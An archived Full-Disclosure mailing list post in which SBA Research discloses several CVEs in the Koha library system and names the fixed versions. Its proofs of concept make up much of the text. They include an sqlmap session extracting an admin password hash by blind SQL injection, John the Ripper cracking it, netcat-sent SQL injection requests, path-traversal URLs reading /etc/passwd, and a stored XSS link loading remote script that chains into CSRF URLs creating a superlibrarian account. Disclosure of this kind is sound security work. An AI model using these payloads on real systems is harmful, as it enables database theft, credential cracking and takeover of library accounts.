lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1435251638046.5953@sba-research.org>
Date: Thu, 25 Jun 2015 17:01:01 +0000
From: Raschin Ghanad-Tavakoli <RGhanad-Tavakoli@...-research.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Cc: Dimitris Simos <DSimos@...-research.org>
Subject: [FD] SBA Research Vulnerability Disclosure - Multiple Critical
 Vulnerabilities in Koha ILS

===============================================================================================
SBA Research Vulnerability Disclosure 
===============================================================================================

title: 			        Koha Unauthenticated SQL injection
product: 		        Koha ILS
affected version:	3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version:		3.20.1, 3.17.8, 3.16.12
CVE numbers:	CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact:			critical
website:		        http://www.koha-community.org/

found by:		        Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact:		        cst@...-research.org


References:		http://koha-community.org/security-release-koha-3-20-1/
			        http://koha-community.org/security-release-koha-3-18-8/
			        http://koha-community.org/security-release-koha-3-16-12/


			        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
			        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
			        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
			        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
			        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
			        ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

=========================
1. Mutiple SQL Injections
=========================

+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

Impact:
-------
By injecting malicious sql code a remote attacker can access the database and read arbritary data. If the webserver is misconfigured, the file-system may be accessed as well.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412


# ################################################################################################## #
# PoC: 												     #
# ################################################################################################## #
1. Inspect Koha database schema

   Have a look at how to query the database for superlibrarian users:
   http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

   So basically we we need to execute some SQL statement like this:
   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

2. Query the database with sqlmap

   So let's fire up sqlmap with the --sql-shell parameter and input the query:

   root@...i:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
         _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
   |_ -| . | |     | .'| . |
   |___|_  |_|_|_|_|__,|  _|
         |_|           |_|   http://sqlmap.org


   [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


   [*] starting at 09:20:07


   [09:20:07] [INFO] testing connection to the target URL
   sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
   ---
   Parameter: number (GET)
       Type: AND/OR time-based blind
       Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
       Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
   ---
   [09:20:09] [INFO] testing MySQL
   [09:20:09] [INFO] confirming MySQL
   [09:20:09] [INFO] the back-end DBMS is MySQL
   web server operating system: Linux Debian
   web application technology: Apache 2.4.10
   back-end DBMS: MySQL >= 5.0.0
   [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER


   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
   [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
   [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
   [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                      
   [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
   admin
   [09:21:46] [INFO] retrieved: $2a$08$taQ
   [09:23:33] [ERROR] invalid character detected. retrying..
   [09:23:33] [WARNING] increasing time delay to 5 seconds 
   afOgEEhU
   [09:25:10] [ERROR] invalid character detected. retrying..
   [09:25:10] [WARNING] increasing time delay to 6 seconds 
   t/gW
   [09:26:13] [ERROR] invalid character detected. retrying..
   [09:26:13] [WARNING] increasing time delay to 7 seconds 
   TOmqnYe1Y6ZNxCENa
   [09:29:57] [ERROR] invalid character detected. retrying..
   [09:29:57] [WARNING] increasing time delay to 8 seconds 
   2.ONk2eZhnuEw5z9OjjxS
   [09:35:08] [ERROR] invalid character detected. retrying..
   [09:35:08] [WARNING] increasing time delay to 9 seconds 

   select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    
   'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

3. Feed john the ripper and be lucky

   root@...i:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
   root@...i:/home/wicked# john ./admin-pass 
   Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
   admin            (?)
   guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
   Use the "--show" option to display all of the cracked passwords reliably

   root@...i:/home/wicked# john ./admin-pass --show
   ?:admin

   1 password hash cracked, 0 left

4. Log in with username "admin" and password "admin" ;)

# ################################################################################################## #
# PoC End											     #
# ################################################################################################## #

+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
An SQL Injection vulnerability exists in /cgi-bin/koha/reports/borrowers_out.pl allows remote attacker's to read arbritrary data via the database due to improper input validation of the parameters Filter and Criteria.

Impact:
-------
By injection malicious sql a remote attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

# ################################################################################################## #
# PoC: 												     #
# ################################################################################################## #

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002


echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

# ################################################################################################## #
# PoC End											     #
# ################################################################################################## #

=================================
3. Path Traversal (CVE-2015-4633)
=================================

Vulnerability
-------------
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.

Impact
------
A remote attacker my read arbitrary files on the system.

References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408


# ################################################################################################## #
# PoC: 												     #
# ################################################################################################## #

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

# ################################################################################################## #
# PoC End											     #
# ################################################################################################## #

=================================
4. XSS and XSRF 
=================================

Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site 
forgery (XSRF) attacks. 

The attack can be performed by:

- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)

The following pages are affected from stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected from relfective XSS flaws:

/cgi-bin/koha/opac-shelves.pl 				(parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl 				        (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl 		(parameters: "value") 
/cgi-bin/koha/acqui/lateorders.pl 			        (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl 	(parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl	(parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl			        (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl			(parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") 
/cgi-bin/koha/suggestion/suggestion.pl 			(parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", 
                                                                                                        "suggesteddate_from", "suggesteddate_to")

Impact
----------
The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:

- escalate privileges by targeting staff members with XSRF 
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities. 

References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

# ################################################################################################## #
# PoC / Attack Scenario: 									     #
# ################################################################################################## #

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:

Create new user:
-----------------------

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibririan permission:
----------------------------------------------------------

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log as superlibrarian.

Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.

# ################################################################################################## #
# PoC / Attack Scenario End									     #
# ################################################################################################## #






_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ